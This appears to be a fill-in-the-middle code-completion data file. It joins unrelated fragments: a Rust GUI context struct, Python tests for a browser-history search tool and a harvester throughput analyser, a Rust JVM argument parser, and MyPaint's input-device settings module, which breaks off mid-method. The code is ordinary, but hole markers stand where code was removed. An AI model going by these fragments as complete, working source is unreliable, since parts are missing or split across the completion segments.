/// Reference counted cells of layouts objects.
pub layouts: Rc<RefCell<BTreeMap<Entity, Box<dyn Layout>>>>,
/// Reference counted cells of handler_map objects.<|fim▁hole|> pub handler_map: Rc<RefCell<EventHandlerMap>>,
/// Reference counted cells of handler_states.
pub states: Rc<RefCell<BTreeMap<Entity, Box<dyn State>>>>,
/// Event adapter objects.
pub event_adapter: EventAdapter,
/// Message adapter objects.
pub message_adapter: MessageAdapter,
/// Reference counted cells of mouse_positions defined as `points`
pub mouse_position: Rc<Cell<Point>>,
/// A window_sender object, used for multiparty session-typed communication.
pub window_sender: mpsc::Sender<WindowRequest>,
/// A shell_sender object, used for multiparty session-typed communication.
pub shell_sender: mpsc::Sender<ShellRequest<WindowAdapter>>,
/// Holds the application name.
pub application_name: String,
/// Reference counted cell to track the `first_run`
pub first_run: Rc<Cell<bool>>,
/// Holds a raw window handler object.
pub raw_window_handle: Option<raw_window_handle::RawWindowHandle>,
// TODO: make it thread safe
/// Reference counted cells that hold the supported localization identifiers.
pub localization: Option<Rc<RefCell<Box<dyn Localization>>>>,
}
impl ContextProvider {
/// Creates a new context provider.
pub fn new(
window_sender: mpsc::Sender<WindowRequest>,
shell_sender: mpsc::Sender<ShellRequest<WindowAdapter>>,
application_name: impl Into<String>,
localization: Option<Rc<RefCell<Box<dyn Localization>>>>,
) -> Self {
ContextProvider {
render_objects: Rc::new(RefCell::new(BTreeMap::new())),
layouts: Rc::new(RefCell::new(BTreeMap::new())),
handler_map: Rc::new(RefCell::new(EventHandlerMap::new())),
states: Rc::new(RefCell::new(BTreeMap::new())),
event_adapter: EventAdapter::new(window_sender.clone()),
message_adapter: MessageAdapter::new(window_sender.clone()),
mouse_position: Rc::new(Cell::new(Point::new(0.0, 0.0))),
window_sender,
shell_sender,
application_name: application_name.into(),
first_run: Rc::new(Cell::new(true)),
raw_window_handle: None,
localization,
}
}
}<|fim▁end|> | |
<|file_name|>test_db_search.py<|end_file_name|><|fim▁begin|>import pytest
from united_states_of_browsers.db_merge.db_search import (
check_fts5_installed,
search,
)
pytestmark = pytest.mark.skipif(
not check_fts5_installed(),
reason="FTS5 not available. Search disabled",
)
def test_search_with_keywords_and_dates(searchable_db_path):
actual_search_results_rec_ids = {}
search_keywords = ("circleci", "google", "gitlab")
for search_keyword_ in search_keywords:
actual_search_results_rec_ids[search_keyword_] = sorted(
[
row["rec_id"]
for row in search(
searchable_db_path,
word_query=search_keyword_,
date_start="2019-01-01",
date_stop="2388-12-31",
)
]
)
expected_search_results_rec_ids = {
"circleci": [50, 51],
"google": [32, 33, 45, 46, 48, 50],
"gitlab": [42, 43, 44],
}
assert expected_search_results_rec_ids == actual_search_results_rec_ids
def test_search_dates_specified(searchable_db_path):
expected_search_results_rec_ids = list(range(39, 52))
actual_search_results_rec_ids = sorted(
[
row["rec_id"]
for row in search(
searchable_db_path,
date_start="2388-09-01",
date_stop="2388-09-30",
)
]
)
assert expected_search_results_rec_ids == actual_search_results_rec_ids
def test_search_keywords(searchable_db_path):
expected_search_results_rec_ids = [13, 31]
actual_search_results_rec_ids = sorted(
[
row["rec_id"]<|fim▁hole|> ]
)
assert expected_search_results_rec_ids == actual_search_results_rec_ids
def test_search_dates_till_now(searchable_db_path):
expected_search_results_rec_ids = [*range(10, 20), *range(29, 39)]
actual_search_results_rec_ids = sorted(
[
row["rec_id"]
for row in search(
searchable_db_path,
)
]
)
assert expected_search_results_rec_ids == actual_search_results_rec_ids
def test_search_date_start(searchable_db_path):
expected_search_results_rec_ids = []
actual_search_results_rec_ids = sorted(
[
row["rec_id"]
for row in search(
searchable_db_path,
date_start="2388-09-01",
)
]
)
assert expected_search_results_rec_ids == actual_search_results_rec_ids
def test_search_date_stop(searchable_db_path):
expected_search_results_rec_ids = [*range(10, 20), *range(29, 39)]
actual_search_results_rec_ids = sorted(
[
row["rec_id"]
for row in search(
searchable_db_path,
date_stop="2019-09-04",
)
]
)
assert expected_search_results_rec_ids == actual_search_results_rec_ids<|fim▁end|> | for row in search(
searchable_db_path,
word_query="start page",
) |
<|file_name|>throughputanalysertest.py<|end_file_name|><|fim▁begin|>## begin license ##
#
# "Meresco Harvester" consists of two subsystems, namely an OAI-harvester and
# a web-control panel.
# "Meresco Harvester" is originally called "Sahara" and was developed for
# SURFnet by:
# Seek You Too B.V. (CQ2) http://www.cq2.nl
#
# Copyright (C) 2006-2007 SURFnet B.V. http://www.surfnet.nl
# Copyright (C) 2007-2008 SURF Foundation. http://www.surf.nl
# Copyright (C) 2007-2009, 2011 Seek You Too (CQ2) http://www.cq2.nl
# Copyright (C) 2007-2009 Stichting Kennisnet Ict op school. http://www.kennisnetictopschool.nl
# Copyright (C) 2009 Tilburg University http://www.uvt.nl
# Copyright (C) 2011, 2020-2021 Stichting Kennisnet https://www.kennisnet.nl
# Copyright (C) 2020-2021 Data Archiving and Network Services https://dans.knaw.nl
# Copyright (C) 2020-2021 SURF https://www.surf.nl
# Copyright (C) 2020-2021 Seecr (Seek You Too B.V.) https://seecr.nl
# Copyright (C) 2020-2021 The Netherlands Institute for Sound and Vision https://beeldengeluid.nl
#
# This file is part of "Meresco Harvester"
#
# "Meresco Harvester" is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# "Meresco Harvester" is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with "Meresco Harvester"; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
## end license ##
import unittest
import datetime, tempfile, os, shutil
from meresco.harvester.throughputanalyser import parseToTime, ThroughputAnalyser, ThroughputReport
class ThroughputAnalyserTest(unittest.TestCase):
def setUp(self):
self.mockAnalyseRepository_arguments = []
self.testdir = os.path.join(tempfile.gettempdir(), 'throughputanalysertest')
not os.path.isdir(self.testdir) and os.makedirs(self.testdir)
def tearDown(self):
shutil.rmtree(self.testdir)
def testParseToTime(self):
timeString = "1999-12-03 12:34:35.123"
date = parseToTime(timeString)
self.assertEqual((1999,12,3,12,34,35,123000), (date.year,date.month,date.day, date.hour, date.minute, date.second, date.microsecond))
date = parseToTime("2006-08-04 10:40:50.644")
self.assertEqual((2006,8,4,10,40,50,644000), (date.year,date.month,date.day, date.hour, date.minute, date.second, date.microsecond))
def testParseToTimeDiff(self):
date1 = parseToTime("1999-12-03 12:34:35.123")
date2 = parseToTime("1999-12-03 12:34:36.423")
delta = date2 - date1
self.assertEqual(1.3, delta.seconds + delta.microseconds/1000000.0)
<|fim▁hole|> t._analyseRepository = self.mockAnalyseRepository
report = t.analyse(['repo1','repo2'], '2006-08-31')
self.assertEqual(1000, report.records)
self.assertEqual(2000.0, report.seconds)
self.assertEqual(['repo1', 'repo2'], self.mockAnalyseRepository_arguments)
def testAnalyseNothing(self):
t = ThroughputAnalyser(eventpath = self.testdir)
t._analyseRepository = self.mockAnalyseRepository
report = t.analyse([], '2006-08-31')
self.assertEqual(0, report.records)
self.assertEqual(0.0, report.seconds)
self.assertEqual('-' , report.recordsPerSecond())
self.assertEqual('-' , report.recordsPerDay())
def testAnalyseRepository(self):
r = open(os.path.join(self.testdir, 'repo1.events'), 'w')
try:
r.write("""
[2006-08-30 00:00:15.500] ENDHARVEST [repo1]
[2006-08-30 01:00:00.000] STARTHARVEST [repo1] Uploader connected ...
[2006-08-30 01:00:10.000] SUCCES [repo1] Harvested/Uploaded/Deleted/Total: 200/200/0/1000, ResumptionToken: r1
[2006-08-30 01:00:15.500] ENDHARVEST [repo1]
[2006-08-31 01:00:00.000] STARTHARVEST [repo1] Uploader connected ...
[2006-08-31 01:00:10.000] SUCCES [repo1] Harvested/Uploaded/Deleted/Total: 200/200/0/1200, ResumptionToken: r1
[2006-08-31 01:00:15.500] ENDHARVEST [repo1]
[2006-08-31 02:00:00.000] STARTHARVEST [repo1] Uploader connected ...
[2006-08-31 02:00:10.000] SUCCES [repo1] Harvested/Uploaded/Deleted/Total: 200/200/0/1400, ResumptionToken: r2
[2006-08-31 02:00:25.500] ENDHARVEST [repo1]
[2006-08-31 03:00:00.000] STARTHARVEST [repo1] Uploader connected ...
[2006-08-31 03:00:10.000] SUCCES [repo1] Harvested/Uploaded/Deleted/Total: 200/200/0/1600, ResumptionToken: r3
[2006-08-31 03:00:35.500] ENDHARVEST [repo1]
""")
finally:
r.close()
t = ThroughputAnalyser(eventpath = self.testdir)
records, seconds = t._analyseRepository('repo1', '2006-08-31')
self.assertEqual(600, records)
self.assertEqual(76.5, seconds)
def testAnalyseNonExistingRepository(self):
t = ThroughputAnalyser(eventpath = self.testdir)
records, seconds = t._analyseRepository('repository', '2006-08-31')
self.assertEqual(0, records)
self.assertEqual(0.0, seconds)
def testReportOnEmptyEventsFile(self):
t = ThroughputAnalyser(eventpath = self.testdir)
records, seconds = t._analyseRepository('repo1', '2006-08-31')
self.assertEqual(0, records)
self.assertEqual(0, seconds)
def testReport(self):
report = ThroughputReport()
report.add(100000,10000.0)
self.assertEqual('10.00', report.recordsPerSecond())
self.assertEqual('864000', report.recordsPerDay())
self.assertEqual("02:46:40", report.hmsString())
#Mock self shunt
def mockAnalyseRepository(self, repositoryName, dateSince):
self.mockAnalyseRepository_arguments.append(repositoryName)
return 500, 1000.0<|fim▁end|> | def testAnalyse(self):
t = ThroughputAnalyser(eventpath = self.testdir) |
<|file_name|>parsed_jvm_command_lines.rs<|end_file_name|><|fim▁begin|>use itertools::Itertools;
use std::slice::Iter;
/// Represents the result of parsing the args of a nailgunnable Process
/// TODO(#8481) We may want to split the classpath by the ":", and store it as a Vec<String>
/// to allow for deep fingerprinting.
#[derive(PartialEq, Eq, Debug)]
pub struct ParsedJVMCommandLines {
pub nailgun_args: Vec<String>,
pub client_args: Vec<String>,
pub client_main_class: String,
}
impl ParsedJVMCommandLines {
///
/// Given a list of args that one would likely pass to a java call,
/// we automatically split it to generate two argument lists:
/// - nailgun arguments: The list of arguments needed to start the nailgun server.
/// These arguments include everything in the arg list up to (but not including) the main class.
/// These arguments represent roughly JVM options (-Xmx...), and the classpath (-cp ...).
///
/// - client arguments: The list of arguments that will be used to run the jvm program under nailgun.
/// These arguments can be thought of as "passthrough args" that are sent to the jvm via the nailgun client.
/// These arguments include everything starting from the main class.
///
/// We assume that:
/// - Every args list has a main class.
/// - There is exactly one argument that doesn't begin with a `-` in the command line before the main class,<|fim▁hole|> /// and it's the value of the classpath (i.e. `-cp scala-library.jar`).
///
/// We think these assumptions are valid as per: https://github.com/pantsbuild/pants/issues/8387
///
pub fn parse_command_lines(args: &[String]) -> Result<ParsedJVMCommandLines, String> {
let mut args_to_consume = args.iter();
let nailgun_args_before_classpath = Self::parse_to_classpath(&mut args_to_consume)?;
let (classpath_flag, classpath_value) = Self::parse_classpath(&mut args_to_consume)?;
let nailgun_args_after_classpath = Self::parse_jvm_args(&mut args_to_consume)?;
let main_class = Self::parse_main_class(&mut args_to_consume)?;
let client_args = Self::parse_to_end(&mut args_to_consume)?;
if args_to_consume.clone().peekable().peek().is_some() {
return Err(format!(
"Malformed command line: There are still arguments to consume: {:?}",
&args_to_consume
));
}
let mut nailgun_args = nailgun_args_before_classpath;
nailgun_args.push(classpath_flag);
nailgun_args.push(classpath_value);
nailgun_args.extend(nailgun_args_after_classpath);
Ok(ParsedJVMCommandLines {
nailgun_args,
client_args,
client_main_class: main_class,
})
}
fn parse_to_classpath(args_to_consume: &mut Iter<String>) -> Result<Vec<String>, String> {
Ok(
args_to_consume
.take_while_ref(|elem| !ParsedJVMCommandLines::is_classpath_flag(elem))
.cloned()
.collect(),
)
}
fn parse_classpath(args_to_consume: &mut Iter<String>) -> Result<(String, String), String> {
let classpath_flag = args_to_consume
.next()
.filter(|e| ParsedJVMCommandLines::is_classpath_flag(e))
.ok_or_else(|| "No classpath flag found.".to_string())
.map(|e| e.clone())?;
let classpath_value = args_to_consume
.next()
.ok_or_else(|| "No classpath value found!".to_string())
.and_then(|elem| {
if ParsedJVMCommandLines::is_flag(elem) {
Err(format!(
"Classpath value has incorrect formatting {}.",
elem
))
} else {
Ok(elem)
}
})?
.clone();
Ok((classpath_flag, classpath_value))
}
fn parse_jvm_args(args_to_consume: &mut Iter<String>) -> Result<Vec<String>, String> {
Ok(
args_to_consume
.take_while_ref(|elem| ParsedJVMCommandLines::is_flag(elem))
.cloned()
.collect(),
)
}
fn parse_main_class(args_to_consume: &mut Iter<String>) -> Result<String, String> {
args_to_consume
.next()
.filter(|e| !ParsedJVMCommandLines::is_flag(e))
.ok_or_else(|| "No main class provided.".to_string())
.map(|e| e.clone())
}
fn parse_to_end(args_to_consume: &mut Iter<String>) -> Result<Vec<String>, String> {
Ok(args_to_consume.cloned().collect())
}
fn is_flag(arg: &str) -> bool {
arg.starts_with('-') || arg.starts_with('@')
}
fn is_classpath_flag(arg: &str) -> bool {
arg == "-cp" || arg == "-classpath"
}
}<|fim▁end|> | |
<|file_name|>device.py<|end_file_name|><|fim▁begin|># This file is part of MyPaint.
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2019 by the MyPaint Development Team.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""Device specific settings and configuration"""
## Imports
from __future__ import division, print_function
import logging
import collections
import re
from lib.gettext import C_
from lib.gibindings import Gtk
from lib.gibindings import Gdk
from lib.gibindings import Pango
from lib.observable import event
import gui.application
import gui.mode
logger = logging.getLogger(__name__)
## Device prefs
# The per-device settings are stored in the prefs in a sub-dict whose
# string keys are formed from the device name and enough extra
# information to (hopefully) identify the device uniquely. Names are not
# unique, and IDs vary according to the order in which you plug devices
# in. So for now, our unique strings use a combination of the device's
# name, its source as presented by GDK, and the number of axes.
_PREFS_ROOT = "input.devices"
_PREFS_DEVICE_SUBKEY_FMT = "{name}:{source}:{num_axes}"
## Device type strings
_DEVICE_TYPE_STRING = {
Gdk.InputSource.CURSOR: C_(
"prefs: device's type label",
"Cursor/puck",
),
Gdk.InputSource.ERASER: C_(
"prefs: device's type label",
"Eraser",
),
Gdk.InputSource.KEYBOARD: C_(
"prefs: device's type label",
"Keyboard",
),
Gdk.InputSource.MOUSE: C_(
"prefs: device's type label",
"Mouse",
),
Gdk.InputSource.PEN: C_(
"prefs: device's type label",
"Pen",
),
Gdk.InputSource.TOUCHPAD: C_(
"prefs: device's type label",
"Touchpad",
),
Gdk.InputSource.TOUCHSCREEN: C_(
"prefs: device's type label",
"Touchscreen",
),
}
## Settings consts and classes
class AllowedUsage:
"""Consts describing how a device may interact with the canvas"""
ANY = "any" #: Device can be used for any tasks.
NOPAINT = "nopaint" #: No direct painting, but can manipulate objects.
NAVONLY = "navonly" #: Device can only be used for navigation.
IGNORED = "ignored" #: Device cannot interact with the canvas at all.
VALUES = (ANY, IGNORED, NOPAINT, NAVONLY)
DISPLAY_STRING = {
IGNORED: C_(
"device settings: allowed usage",
u"Ignore",
),
ANY: C_(
"device settings: allowed usage",
u"Any Task",
),
NOPAINT: C_(
"device settings: allowed usage",
u"Non-painting tasks",
),
NAVONLY: C_(
"device settings: allowed usage",
u"Navigation only",
),
}
BEHAVIOR_MASK = {
ANY: gui.mode.Behavior.ALL,
IGNORED: gui.mode.Behavior.NONE,
NOPAINT: gui.mode.Behavior.NON_PAINTING,
NAVONLY: gui.mode.Behavior.CHANGE_VIEW,
}
class ScrollAction:
    """Consts describing how a device's scroll events should be used.

    The user can assign one of these values to a device to configure
    whether they'd prefer panning or scrolling for unmodified scroll
    events. This setting can be queried via the device monitor.
    """

    ZOOM = "zoom"  #: Alter the canvas scaling
    PAN = "pan"  #: Pan across the canvas

    #: All recognized config values; index 0 is the default used by
    #: Settings.DEFAULT_SCROLL.
    VALUES = (ZOOM, PAN)

    #: Maps config value -> translated label shown in the prefs UI.
    DISPLAY_STRING = {
        ZOOM: C_("device settings: unmodified scroll action", u"Zoom"),
        PAN: C_("device settings: unmodified scroll action", u"Pan"),
    }
class Settings (object):
    """A device's settings

    Wraps a per-device preferences sub-dict. Values are validated on
    load, and every change made through the ``usage``/``scroll``
    properties is written back to the prefs immediately.
    """

    DEFAULT_USAGE = AllowedUsage.VALUES[0]
    DEFAULT_SCROLL = ScrollAction.VALUES[0]

    def __init__(self, prefs, usage=DEFAULT_USAGE, scroll=DEFAULT_SCROLL):
        """Initialize from a prefs sub-dict.

        :param dict prefs: live per-device prefs sub-dict to read/write
        :param str usage: fallback AllowedUsage value used when the prefs
            entry is missing or invalid. (Previously this argument was
            silently ignored; it is now honored as the fallback.)
        :param str scroll: fallback ScrollAction value, same semantics.
        """
        super(Settings, self).__init__()
        # Sanitize the caller-supplied fallbacks before trusting them.
        if usage not in AllowedUsage.VALUES:
            usage = self.DEFAULT_USAGE
        if scroll not in ScrollAction.VALUES:
            scroll = self.DEFAULT_SCROLL
        self._usage = usage
        self._update_usage_mask()
        self._scroll = scroll
        self._prefs = prefs
        self._load_from_prefs(fallback_usage=usage, fallback_scroll=scroll)

    @property
    def usage(self):
        """The device's AllowedUsage config value (str)."""
        return self._usage

    @usage.setter
    def usage(self, value):
        if value not in AllowedUsage.VALUES:
            raise ValueError("Unrecognized usage value")
        self._usage = value
        self._update_usage_mask()
        self._save_to_prefs()

    @property
    def usage_mask(self):
        """gui.mode.Behavior bitmask derived from `usage` (read-only)."""
        return self._usage_mask

    @property
    def scroll(self):
        """The device's ScrollAction config value (str)."""
        return self._scroll

    @scroll.setter
    def scroll(self, value):
        if value not in ScrollAction.VALUES:
            raise ValueError("Unrecognized scroll value")
        self._scroll = value
        self._save_to_prefs()

    def _load_from_prefs(self, fallback_usage=None, fallback_scroll=None):
        """Load state from prefs, falling back to the given defaults.

        Called with no arguments this behaves exactly as before
        (falls back to the class defaults).
        """
        if fallback_usage is None:
            fallback_usage = self.DEFAULT_USAGE
        if fallback_scroll is None:
            fallback_scroll = self.DEFAULT_SCROLL
        usage = self._prefs.get("usage", fallback_usage)
        if usage not in AllowedUsage.VALUES:
            usage = fallback_usage
        self._usage = usage
        scroll = self._prefs.get("scroll", fallback_scroll)
        if scroll not in ScrollAction.VALUES:
            scroll = fallback_scroll
        self._scroll = scroll
        self._update_usage_mask()

    def _save_to_prefs(self):
        """Write the current state back into the prefs sub-dict."""
        self._prefs.update({
            "usage": self._usage,
            "scroll": self._scroll,
        })

    def _update_usage_mask(self):
        # Keep the cached behavior bitmask in sync with self._usage.
        self._usage_mask = AllowedUsage.BEHAVIOR_MASK[self._usage]
## Main class defs
class Monitor (object):
"""Monitors device use & plugging, and manages their configuration
An instance resides in the main application. It is responsible for
monitoring known devices, determining their characteristics, and
storing their settings. Per-device settings are stored in the main
application preferences.
"""
    def __init__(self, app):
        """Initializes, assigning initial input device uses

        :param app: the owning Application instance, or None for
            standalone/interactive testing (see _test()).
        :type app: gui.application.Application
        """
        super(Monitor, self).__init__()
        self._app = app
        # With app=None, keep settings in a plain in-memory dict instead
        # of the application's persistent preferences.
        if app is not None:
            self._prefs = app.preferences
        else:
            self._prefs = {}
        if _PREFS_ROOT not in self._prefs:
            self._prefs[_PREFS_ROOT] = {}
        # Transient device information
        self._device_settings = collections.OrderedDict()  # {dev: settings}
        self._last_event_device = None
        self._last_pen_device = None
        # Subscribe to hotplug notifications, then seed settings for every
        # physical ("slave") device currently plugged in.
        disp = Gdk.Display.get_default()
        mgr = disp.get_device_manager()
        mgr.connect("device-added", self._device_added_cb)
        mgr.connect("device-removed", self._device_removed_cb)
        self._device_manager = mgr
        for physical_device in mgr.list_devices(Gdk.DeviceType.SLAVE):
            self._init_device_settings(physical_device)
## Devices list
def get_device_settings(self, device):
"""Gets the settings for a device
:param Gdk.Device device: a physical ("slave") device
:returns: A settings object which can be manipulated, or None
:rtype: Settings
Changes to the returned object made via its API are saved to the
user preferences immediately.
If the device is a keyboard, or is otherwise unsuitable as a
pointing device, None is returned instead. The caller needs to
check this case.
"""
return (self._device_settings.get(device)
or self._init_device_settings(device))
def _init_device_settings(self, device):
"""Ensures that the device settings are loaded for a device"""
source = device.get_source()
if source == Gdk.InputSource.KEYBOARD:
return
num_axes = device.get_n_axes()
if num_axes < 2:
return
settings = self._device_settings.get(device)
if not settings:
try:
vendor_id = device.get_vendor_id()
product_id = device.get_product_id()
except AttributeError:
# New in GDK 3.16
vendor_id = "?"
product_id = "?"
logger.info(
"New device %r"
" (%s, axes:%d, class=%s, vendor=%r, product=%r)",
device.get_name(),
source.value_name,
num_axes,
device.__class__.__name__,
vendor_id,
product_id,
)
dev_prefs_key = _device_prefs_key(device)
dev_prefs = self._prefs[_PREFS_ROOT].setdefault(dev_prefs_key, {})<|fim▁hole|> return settings
    def _device_added_cb(self, mgr, device):
        """Informs that a device has been plugged in

        GDK "device-added" handler: lazily builds settings for the new
        device. Keyboards and devices with fewer than two axes are
        filtered out inside _init_device_settings().
        """
        logger.debug("device-added %r", device.get_name())
        self._init_device_settings(device)
    def _device_removed_cb(self, mgr, device):
        """Informs that a device has been unplugged"""
        logger.debug("device-removed %r", device.get_name())
        # Drop only the cached Settings object; the persisted prefs
        # entry is kept so the device's config survives re-plugging.
        self._device_settings.pop(device, None)
        self.devices_updated()
@event
def devices_updated(self):
"""Event: the devices list was changed"""
def get_devices(self):
"""Yields devices and their settings, for UI stuff
:rtype: iterator
:returns: ultimately a sequence of (Gdk.Device, Settings) pairs
"""
for device, settings in self._device_settings.items():
yield (device, settings)
## Current device
@event
def current_device_changed(self, old_device, new_device):
"""Event: the current device has changed
:param Gdk.Device old_device: Previous device used
:param Gdk.Device new_device: New device used
"""
    def device_used(self, device):
        """Informs about a device being used, for use by controllers

        :param Gdk.Device device: the device being used
        :returns: whether the device changed

        If the device has changed, this method then notifies interested
        parties via the device_changed observable @event.

        This method returns True if the device was the same as the previous
        device, and False if it has changed.
        """
        # NOTE(review): on an actual device change this method falls
        # through and implicitly returns None, which is falsy and so
        # matches the documented "False" contract only loosely.
        if not self.get_device_settings(device):
            return False
        if device == self._last_event_device:
            return True
        self.current_device_changed(self._last_event_device, device)
        old_device = self._last_event_device
        new_device = device
        self._last_event_device = device
        # small problem with this code: it doesn't work well with brushes that
        # have (eraser not in [1.0, 0.0])
        # NOTE(review): attributes are monkey-patched onto the Gdk.Device
        # here; later code in this method reads .name/.source directly.
        new_device.name = new_device.props.name
        new_device.source = new_device.props.input_source
        logger.debug(
            "Device change: name=%r source=%s",
            new_device.name, new_device.source.value_name,
        )
        # When editing brush settings, it is often more convenient to use the
        # mouse. Because of this, we don't restore brushsettings when switching
        # to/from the mouse. We act as if the mouse was identical to the last
        # active pen device.
        if (new_device.source == Gdk.InputSource.MOUSE and
                self._last_pen_device):
            new_device = self._last_pen_device
        if new_device.source == Gdk.InputSource.PEN:
            self._last_pen_device = new_device
        if (old_device and old_device.source == Gdk.InputSource.MOUSE and
                self._last_pen_device):
            old_device = self._last_pen_device
        bm = self._app.brushmanager
        if old_device:
            # Clone for saving
            old_brush = bm.clone_selected_brush(name=None)
            bm.store_brush_for_device(old_device.name, old_brush)
        if new_device.source == Gdk.InputSource.MOUSE:
            # Avoid fouling up unrelated devbrushes at stroke end
            self._prefs.pop('devbrush.last_used', None)
        else:
            # Select the brush and update the UI.
            # Use a sane default if there's nothing associated
            # with the device yet.
            brush = bm.fetch_brush_for_device(new_device.name)
            if brush is None:
                if device_is_eraser(new_device):
                    brush = bm.get_default_eraser()
                else:
                    brush = bm.get_default_brush()
            self._prefs['devbrush.last_used'] = new_device.name
            bm.select_brush(brush)
class SettingsEditor (Gtk.Grid):
    """Per-device settings editor

    Shows one row per pointing device known to the Monitor, with
    dropdowns for the allowed-usage and scroll-action settings.
    """

    ## Class consts

    # (config, display-string) column indices of the dropdown stores.
    _USAGE_CONFIG_COL = 0
    _USAGE_STRING_COL = 1
    _SCROLL_CONFIG_COL = 0
    _SCROLL_STRING_COL = 1

    __gtype_name__ = "MyPaintDeviceSettingsEditor"

    ## Initialization

    def __init__(self, monitor=None):
        """Initialize

        :param Monitor monitor: monitor instance (for testing)

        By default, the central app's `device_monitor` is used to permit
        parameterless construction.
        """
        super(SettingsEditor, self).__init__()
        if monitor is None:
            app = gui.application.get_app()
            monitor = app.device_monitor
        self._monitor = monitor

        self._devices_store = Gtk.ListStore(object)
        self._devices_view = Gtk.TreeView(model=self._devices_store)

        # Device name column.
        col = Gtk.TreeViewColumn(C_(
            "prefs: devices table: column header",
            # TRANSLATORS: Column's data is the device's name
            "Device",
        ))
        col.set_min_width(200)
        col.set_expand(True)
        col.set_sizing(Gtk.TreeViewColumnSizing.AUTOSIZE)
        self._devices_view.append_column(col)
        cell = Gtk.CellRendererText()
        cell.set_property("ellipsize", Pango.EllipsizeMode.MIDDLE)
        col.pack_start(cell, True)
        col.set_cell_data_func(cell, self._device_name_datafunc)

        # Axis count column.
        col = Gtk.TreeViewColumn(C_(
            "prefs: devices table: column header",
            # TRANSLATORS: Column's data is the number of axes (an integer)
            "Axes",
        ))
        col.set_min_width(30)
        col.set_resizable(True)
        col.set_expand(False)
        col.set_sizing(Gtk.TreeViewColumnSizing.AUTOSIZE)
        self._devices_view.append_column(col)
        cell = Gtk.CellRendererText()
        col.pack_start(cell, True)
        col.set_cell_data_func(cell, self._device_axes_datafunc)

        # Device type column.
        col = Gtk.TreeViewColumn(C_(
            "prefs: devices table: column header",
            # TRANSLATORS: Column shows type labels ("Touchscreen", "Pen" etc.)
            "Type",
        ))
        col.set_min_width(120)
        col.set_resizable(True)
        col.set_expand(False)
        col.set_sizing(Gtk.TreeViewColumnSizing.AUTOSIZE)
        self._devices_view.append_column(col)
        cell = Gtk.CellRendererText()
        cell.set_property("ellipsize", Pango.EllipsizeMode.END)
        col.pack_start(cell, True)
        col.set_cell_data_func(cell, self._device_type_datafunc)

        # Usage config value => string store (dropdowns)
        store = Gtk.ListStore(str, str)
        for conf_val in AllowedUsage.VALUES:
            string = AllowedUsage.DISPLAY_STRING[conf_val]
            store.append([conf_val, string])
        self._usage_store = store

        col = Gtk.TreeViewColumn(C_(
            "prefs: devices table: column header",
            # TRANSLATORS: Column's data is a dropdown allowing the allowed
            # TRANSLATORS: tasks for the row's device to be configured.
            u"Use for…",
        ))
        col.set_min_width(100)
        col.set_resizable(True)
        col.set_expand(False)
        self._devices_view.append_column(col)

        cell = Gtk.CellRendererCombo()
        cell.set_property("model", self._usage_store)
        cell.set_property("text-column", self._USAGE_STRING_COL)
        cell.set_property("mode", Gtk.CellRendererMode.EDITABLE)
        cell.set_property("editable", True)
        cell.set_property("has-entry", False)
        cell.set_property("ellipsize", Pango.EllipsizeMode.END)
        cell.connect("changed", self._usage_cell_changed_cb)
        col.pack_start(cell, True)
        col.set_cell_data_func(cell, self._device_usage_datafunc)

        # Scroll action config value => string store (dropdowns)
        store = Gtk.ListStore(str, str)
        for conf_val in ScrollAction.VALUES:
            string = ScrollAction.DISPLAY_STRING[conf_val]
            store.append([conf_val, string])
        self._scroll_store = store

        col = Gtk.TreeViewColumn(C_(
            "prefs: devices table: column header",
            # TRANSLATORS: Column's data is a dropdown for how the device's
            # TRANSLATORS: scroll wheel or scroll-gesture events are to be
            # TRANSLATORS: interpreted normally.
            u"Scroll…",
        ))
        col.set_min_width(100)
        col.set_resizable(True)
        col.set_expand(False)
        self._devices_view.append_column(col)

        cell = Gtk.CellRendererCombo()
        cell.set_property("model", self._scroll_store)
        # FIX: this cell renders the scroll store, so it must use the
        # scroll store's string column. The original code passed
        # self._USAGE_STRING_COL here, which only worked by coincidence
        # because both constants happen to equal 1.
        cell.set_property("text-column", self._SCROLL_STRING_COL)
        cell.set_property("mode", Gtk.CellRendererMode.EDITABLE)
        cell.set_property("editable", True)
        cell.set_property("has-entry", False)
        cell.set_property("ellipsize", Pango.EllipsizeMode.END)
        cell.connect("changed", self._scroll_cell_changed_cb)
        col.pack_start(cell, True)
        col.set_cell_data_func(cell, self._device_scroll_datafunc)

        # Pretty borders
        view_scroll = Gtk.ScrolledWindow()
        view_scroll.set_shadow_type(Gtk.ShadowType.ETCHED_IN)
        pol = Gtk.PolicyType.AUTOMATIC
        view_scroll.set_policy(pol, pol)
        view_scroll.add(self._devices_view)
        view_scroll.set_hexpand(True)
        view_scroll.set_vexpand(True)
        self.attach(view_scroll, 0, 0, 1, 1)

        self._update_devices_store()
        self._monitor.devices_updated += self._update_devices_store

    ## Display and sort funcs

    def _device_name_datafunc(self, column, cell, model, iter_, *data):
        device = model.get_value(iter_, 0)
        cell.set_property("text", device.get_name())

    def _device_axes_datafunc(self, column, cell, model, iter_, *data):
        device = model.get_value(iter_, 0)
        n_axes = device.get_n_axes()
        cell.set_property("text", "%d" % (n_axes,))

    def _device_type_datafunc(self, column, cell, model, iter_, *data):
        device = model.get_value(iter_, 0)
        source = device.get_source()
        text = _DEVICE_TYPE_STRING.get(source, source.value_nick)
        cell.set_property("text", text)

    def _device_usage_datafunc(self, column, cell, model, iter_, *data):
        device = model.get_value(iter_, 0)
        settings = self._monitor.get_device_settings(device)
        if not settings:
            return
        text = AllowedUsage.DISPLAY_STRING[settings.usage]
        cell.set_property("text", text)

    def _device_scroll_datafunc(self, column, cell, model, iter_, *data):
        device = model.get_value(iter_, 0)
        settings = self._monitor.get_device_settings(device)
        if not settings:
            return
        text = ScrollAction.DISPLAY_STRING[settings.scroll]
        cell.set_property("text", text)

    ## Updates

    def _usage_cell_changed_cb(self, combo, device_path_str,
                               usage_iter, *etc):
        # Persist the new usage choice via the Settings property setter.
        config = self._usage_store.get_value(
            usage_iter,
            self._USAGE_CONFIG_COL,
        )
